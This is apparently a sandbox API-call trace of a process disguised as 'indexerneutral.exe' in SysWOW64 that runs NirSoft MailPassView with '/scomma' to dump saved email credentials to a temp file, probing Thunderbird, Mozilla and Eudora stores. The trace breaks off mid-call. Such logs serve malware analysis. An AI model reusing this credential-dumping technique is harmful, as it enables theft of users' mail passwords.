0x4123e1 [0251.564] _onexit (_Func=0x4123f2) returned 0x4123f2 [0251.564] _onexit (_Func=0x412433) returned 0x412433 [0251.564] GetStartupInfoA (in: lpStartupInfo=0x19ff08 | out: lpStartupInfo=0x19ff08*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutral.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0251.564] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0251.564] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x73910000 [0251.564] GetProcAddress (hModule=0x73910000, lpProcName="InitCommonControlsEx") returned 0x73915000 [0251.564] InitCommonControlsEx (picce=0x19fae8) returned 1 [0251.565] FreeLibrary (hLibModule=0x73910000) returned 1 [0251.565] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74790000 [0251.565] GetProcAddress (hModule=0x74790000, lpProcName="SHGetSpecialFolderPathA") returned 0x74a34f00 [0251.566] _mbscpy (in: param_1=0x9c2b9b, param_2=0x413fc4 | out: param_1=0x9c2b9b) returned 0x9c2b9b [0251.566] _mbscpy (in: param_1=0x9c2ddf, param_2=0x413fc4 | out: param_1=0x9c2ddf) returned 0x9c2ddf [0251.566] _mbscpy (in: param_1=0x19f9bc, param_2=0x414488 | out: param_1=0x19f9bc) returned 0x19f9bc [0251.566] CreateFontIndirectA (lplf=0x19f9a0) returned 0x30a01cb [0251.566] strncat (in: _Dest="", _Source="Nðú\x19", _Count=0x1 | out: _Dest="N") returned="N" [0251.566] strncat (in: _Dest="N", _Source="iðú\x19", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0251.566] strncat (in: _Dest="Ni", _Source="rðú\x19", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0251.566] strncat (in: _Dest="Nir", _Source="Sðú\x19", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0251.566] strncat (in: _Dest="NirS", _Source="oðú\x19", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0251.566] strncat (in: _Dest="NirSo", _Source="fðú\x19", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0251.566] strncat (in: _Dest="NirSof", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0251.566] strncat (in: _Dest="NirSoft", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0251.566] strncat (in: _Dest="NirSoft ", _Source="Fðú\x19", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0251.566] strncat (in: _Dest="NirSoft F", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0251.566] strncat (in: _Dest="NirSoft Fr", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0251.566] strncat (in: _Dest="NirSoft Fre", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0251.566] strncat (in: _Dest="NirSoft Free", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0251.566] strncat (in: _Dest="NirSoft Freew", _Source="aðú\x19", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0251.566] strncat (in: _Dest="NirSoft Freewa", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0251.566] strncat (in: _Dest="NirSoft Freewar", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0251.566] strncat (in: _Dest="NirSoft Freeware", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0251.566] strncat (in: _Dest="NirSoft Freeware.", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0251.566] strncat (in: _Dest="NirSoft Freeware. ", _Source=" ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0251.566] strncat (in: _Dest="NirSoft Freeware. ", _Source="hðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0251.567] strncat (in: _Dest="NirSoft Freeware. h", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0251.567] strncat (in: _Dest="NirSoft Freeware. ht", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0251.567] strncat (in: _Dest="NirSoft Freeware. htt", _Source="pðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0251.567] strncat (in: _Dest="NirSoft Freeware. http", _Source=":ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0251.567] strncat (in: _Dest="NirSoft Freeware. http:", _Source="/ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0251.567] strncat (in: _Dest="NirSoft Freeware. http:/", _Source="/ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://w", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://ww", _Source="wðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") returned="NirSoft Freeware. http://www" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") returned="NirSoft Freeware. http://www." [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.", _Source="nðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.n", _Source="iðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.ni", _Source="rðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nir", _Source="sðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirs", _Source="oðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirso", _Source="fðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirsof", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft", _Source=".ðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.", _Source="nðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.n", _Source="eðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0251.567] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.ne", _Source="tðú\x19", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0251.567] LoadIconA (hInstance=0x400000, lpIconName=0x65) returned 0x20087 [0251.569] strncat (in: _Dest="", _Source="Mðú\x19", _Count=0x1 | out: _Dest="M") returned="M" [0251.569] strncat (in: _Dest="M", _Source="aðú\x19", _Count=0x1 | out: _Dest="Ma") returned="Ma" [0251.570] strncat (in: _Dest="Ma", _Source="iðú\x19", _Count=0x1 | out: _Dest="Mai") returned="Mai" [0251.570] strncat (in: _Dest="Mai", _Source="lðú\x19", _Count=0x1 | out: _Dest="Mail") returned="Mail" [0251.570] strncat (in: _Dest="Mail", _Source="Pðú\x19", _Count=0x1 | out: _Dest="MailP") returned="MailP" [0251.570] strncat (in: _Dest="MailP", _Source="aðú\x19", _Count=0x1 | out: _Dest="MailPa") returned="MailPa" [0251.570] strncat (in: _Dest="MailPa", _Source="sðú\x19", _Count=0x1 | out: _Dest="MailPas") returned="MailPas" [0251.570] strncat (in: _Dest="MailPas", _Source="sðú\x19", _Count=0x1 | out: _Dest="MailPass") returned="MailPass" [0251.570] strncat (in: _Dest="MailPass", _Source="Vðú\x19", _Count=0x1 | out: _Dest="MailPassV") returned="MailPassV" [0251.570] strncat (in: _Dest="MailPassV", _Source="iðú\x19", _Count=0x1 | out: _Dest="MailPassVi") returned="MailPassVi" [0251.570] strncat (in: _Dest="MailPassVi", _Source="eðú\x19", _Count=0x1 | out: _Dest="MailPassVie") returned="MailPassVie" [0251.570] strncat (in: _Dest="MailPassVie", _Source="wðú\x19", _Count=0x1 | out: _Dest="MailPassView") returned="MailPassView" [0251.570] _mbscpy (in: param_1=0x19fb5c, param_2=0x19f9ec | out: param_1=0x19fb5c) returned 0x19fb5c [0251.570] strlen (_Str="/scomma") returned 0x7 [0251.570] strlen (_Str="C:\\Windows\\TEMP\\3256.tmp") returned 0x18 [0251.570] _strcmpi (_Str1="/savelangfile", _Str2="/scomma") returned -1 [0251.570] _strcmpi (_Str1="/savelangfile", _Str2="C:\\Windows\\TEMP\\3256.tmp") returned -1 [0251.570] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19f9e8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0251.570] _mbscat (in: param_1=0x19f9e8, param_2=0x4141e4 | out: param_1=0x19f9e8) returned 0x19f9e8 [0251.570] GetFileAttributesA (lpFileName="C:\\Windows\\SysWOW64\\indexerneutral_lng.ini" (normalized: "c:\\windows\\syswow64\\indexerneutral_lng.ini")) returned 0xffffffff [0251.570] _strcmpi (_Str1="/deleteregkey", _Str2="/scomma") returned -1 [0251.570] _strcmpi (_Str1="/deleteregkey", _Str2="C:\\Windows\\TEMP\\3256.tmp") returned -1 [0251.571] EnumResourceTypesA (hModule=0x400000, lpEnumFunc=0x40f402, lParam=0x0) returned 1 [0251.571] EnumResourceNamesA (hModule=0x400000, lpType=0x1, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.571] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x4194d8 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x134 [0251.571] LoadResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x4196b8 [0251.571] LockResource (hResData=0x4196b8) returned 0x4196b8 [0251.571] EnumResourceNamesA (hModule=0x400000, lpType=0x2, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.571] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x4194e8 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x3e8 [0251.571] LoadResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x4197ec [0251.571] LockResource (hResData=0x4197ec) returned 0x4197ec [0251.571] FindResourceA (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x4194f8 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x4194f8) returned 0xd8 [0251.571] LoadResource (hModule=0x400000, hResInfo=0x4194f8) returned 0x419bd4 [0251.571] LockResource (hResData=0x419bd4) returned 0x419bd4 [0251.571] FindResourceA (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x419508 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x419508) returned 0xd8 [0251.571] LoadResource (hModule=0x400000, hResInfo=0x419508) returned 0x419cac [0251.571] LockResource (hResData=0x419cac) returned 0x419cac [0251.571] EnumResourceNamesA (hModule=0x400000, lpType=0x3, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.571] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x419518 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x419518) returned 0x2e8 [0251.571] LoadResource (hModule=0x400000, hResInfo=0x419518) returned 0x419d84 [0251.571] LockResource (hResData=0x419d84) returned 0x419d84 [0251.571] FindResourceA (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x419528 [0251.571] SizeofResource (hModule=0x400000, hResInfo=0x419528) returned 0x128 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419528) returned 0x41a06c [0251.572] LockResource (hResData=0x41a06c) returned 0x41a06c [0251.572] FindResourceA (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x419538 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419538) returned 0x128 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419538) returned 0x41a194 [0251.572] LockResource (hResData=0x41a194) returned 0x41a194 [0251.572] EnumResourceNamesA (hModule=0x400000, lpType=0x4, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.572] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x419548 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419548) returned 0x38c [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419548) returned 0x41a2bc [0251.572] LockResource (hResData=0x41a2bc) returned 0x41a2bc [0251.572] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x419558 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419558) returned 0x1f2 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419558) returned 0x41a648 [0251.572] LockResource (hResData=0x41a648) returned 0x41a648 [0251.572] EnumResourceNamesA (hModule=0x400000, lpType=0x5, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.572] FindResourceA (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x419568 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419568) returned 0xa2 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419568) returned 0x41a83c [0251.572] LockResource (hResData=0x41a83c) returned 0x41a83c [0251.572] FindResourceA (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x419578 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419578) returned 0x296 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419578) returned 0x41a8e0 [0251.572] LockResource (hResData=0x41a8e0) returned 0x41a8e0 [0251.572] FindResourceA (hModule=0x400000, lpName=0x6c, lpType=0x5) returned 0x419588 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419588) returned 0x364 [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419588) returned 0x41ab78 [0251.572] LockResource (hResData=0x41ab78) returned 0x41ab78 [0251.572] FindResourceA (hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x419598 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x419598) returned 0xfa [0251.572] LoadResource (hModule=0x400000, hResInfo=0x419598) returned 0x41aedc [0251.572] LockResource (hResData=0x41aedc) returned 0x41aedc [0251.572] FindResourceA (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x4195a8 [0251.572] SizeofResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x336 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x41afd8 [0251.573] LockResource (hResData=0x41afd8) returned 0x41afd8 [0251.573] EnumResourceNamesA (hModule=0x400000, lpType=0x6, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.573] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x4195b8 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x1f2 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x41b310 [0251.573] LockResource (hResData=0x41b310) returned 0x41b310 [0251.573] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x6) returned 0x4195c8 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x24 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x41b504 [0251.573] LockResource (hResData=0x41b504) returned 0x41b504 [0251.573] FindResourceA (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x4195d8 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x13a [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x41b528 [0251.573] LockResource (hResData=0x41b528) returned 0x41b528 [0251.573] FindResourceA (hModule=0x400000, lpName=0x21, lpType=0x6) returned 0x4195e8 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x3e [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x41b664 [0251.573] LockResource (hResData=0x41b664) returned 0x41b664 [0251.573] FindResourceA (hModule=0x400000, lpName=0x33, lpType=0x6) returned 0x4195f8 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x48 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x41b6a4 [0251.573] LockResource (hResData=0x41b6a4) returned 0x41b6a4 [0251.573] FindResourceA (hModule=0x400000, lpName=0x39, lpType=0x6) returned 0x419608 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x419608) returned 0x134 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x419608) returned 0x41b6ec [0251.573] LockResource (hResData=0x41b6ec) returned 0x41b6ec [0251.573] FindResourceA (hModule=0x400000, lpName=0x3a, lpType=0x6) returned 0x419618 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x419618) returned 0xa6 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x419618) returned 0x41b820 [0251.573] LockResource (hResData=0x41b820) returned 0x41b820 [0251.573] FindResourceA (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x419628 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x419628) returned 0x74 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x419628) returned 0x41b8c8 [0251.573] LockResource (hResData=0x41b8c8) returned 0x41b8c8 [0251.573] FindResourceA (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x419638 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x419638) returned 0xaa [0251.573] LoadResource (hModule=0x400000, hResInfo=0x419638) returned 0x41b93c [0251.573] LockResource (hResData=0x41b93c) returned 0x41b93c [0251.573] FindResourceA (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x419648 [0251.573] SizeofResource (hModule=0x400000, hResInfo=0x419648) returned 0x68 [0251.573] LoadResource (hModule=0x400000, hResInfo=0x419648) returned 0x41b9e8 [0251.573] LockResource (hResData=0x41b9e8) returned 0x41b9e8 [0251.573] EnumResourceNamesA (hModule=0x400000, lpType=0x9, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.573] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0x9) returned 0x419658 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x419658) returned 0x50 [0251.574] LoadResource (hModule=0x400000, hResInfo=0x419658) returned 0x41ba50 [0251.574] LockResource (hResData=0x41ba50) returned 0x41ba50 [0251.574] EnumResourceNamesA (hModule=0x400000, lpType=0xc, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.574] FindResourceA (hModule=0x400000, lpName=0x67, lpType=0xc) returned 0x419668 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x419668) returned 0x14 [0251.574] LoadResource (hModule=0x400000, hResInfo=0x419668) returned 0x41baa0 [0251.574] LockResource (hResData=0x41baa0) returned 0x41baa0 [0251.574] EnumResourceNamesA (hModule=0x400000, lpType=0xe, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.574] FindResourceA (hModule=0x400000, lpName=0x65, lpType=0xe) returned 0x419678 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x419678) returned 0x22 [0251.574] LoadResource (hModule=0x400000, hResInfo=0x419678) returned 0x41bab4 [0251.574] LockResource (hResData=0x41bab4) returned 0x41bab4 [0251.574] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0xe) returned 0x419688 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x419688) returned 0x14 [0251.574] LoadResource (hModule=0x400000, hResInfo=0x419688) returned 0x41bad8 [0251.574] LockResource (hResData=0x41bad8) returned 0x41bad8 [0251.574] EnumResourceNamesA (hModule=0x400000, lpType=0x10, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.574] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x10) returned 0x419698 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x419698) returned 0x26c [0251.574] LoadResource (hModule=0x400000, hResInfo=0x419698) returned 0x41baec [0251.574] LockResource (hResData=0x41baec) returned 0x41baec [0251.574] EnumResourceNamesA (hModule=0x400000, lpType=0x18, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0251.574] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x18) returned 0x4196a8 [0251.574] SizeofResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x16a [0251.574] LoadResource (hModule=0x400000, hResInfo=0x4196a8) returned 0x41bd58 [0251.574] LockResource (hResData=0x41bd58) returned 0x41bd58 [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3e9, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Name") returned 0x4 [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3ea, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Application") returned 0xb [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0251.575] LoadStringA (in: hInstance=0x400000, uID=0x3eb, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Email") returned 0x5 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ec, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Server") returned 0x6 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f1, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Server Port") returned 0xb [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f2, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Secured") returned 0x7 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ed, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Type") returned 0x4 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ee, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="User") returned 0x4 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3ef, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Password") returned 0x8 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f0, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Profile") returned 0x7 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f3, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="Password Strength") returned 0x11 [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0251.576] LoadStringA (in: hInstance=0x400000, uID=0x3f4, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="SMTP Server") returned 0xb [0251.577] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0251.577] LoadStringA (in: hInstance=0x400000, uID=0x3f5, lpBuffer=0x9cc6d8, cchBufferMax=4095 | out: lpBuffer="SMTP Server Port") returned 0x10 [0251.577] GetVersionExA (in: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x418118*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0251.577] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x19f8c4, csidl=26, fCreate=0 | out: pszPath="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 1 [0251.867] strlen (_Str="Mozilla\\Profiles") returned 0x10 [0251.867] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0251.867] _mbscpy (in: param_1=0x9c2f70, param_2=0x19f8c4 | out: param_1=0x9c2f70) returned 0x9c2f70 [0251.867] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0251.867] _mbscat (in: param_1=0x9c2f70, param_2=0x414078 | out: param_1=0x9c2f70) returned 0x9c2f70 [0251.867] _mbscat (in: param_1=0x9c2f70, param_2=0x413488 | out: param_1=0x9c2f70) returned 0x9c2f70 [0251.867] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Mozilla\\Profiles" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\mozilla\\profiles")) returned 0xffffffff [0251.867] strlen (_Str="Thunderbird\\Profiles") returned 0x14 [0251.867] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0251.867] _mbscpy (in: param_1=0x9c3075, param_2=0x19f8c4 | out: param_1=0x9c3075) returned 0x9c3075 [0251.867] strlen (_Str="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming") returned 0x38 [0251.867] _mbscat (in: param_1=0x9c3075, param_2=0x414078 | out: param_1=0x9c3075) returned 0x9c3075 [0252.096] _mbscat (in: param_1=0x9c3075, param_2=0x41349c | out: param_1=0x9c3075) returned 0x9c3075 [0252.096] GetFileAttributesA (lpFileName="C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Thunderbird\\Profiles" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\thunderbird\\profiles")) returned 0xffffffff [0252.096] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Qualcomm\\Eudora\\CommandLine", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f190 | out: phkResult=0x19f190*=0x0) returned 0x2 [0252.096] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Classes\\Software\\Qualcomm\\Eudora\\CommandLine\\current", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f190 | out: phkResult=0x19f190*=0x0) returned 0x2 [0252.096] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Mozilla\\Mozilla Thunderbird", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fad8 | out: phkResult=0x19fad8*=0x0) returned 0x2 [0252.096] ExpandEnvironmentStringsA (in: 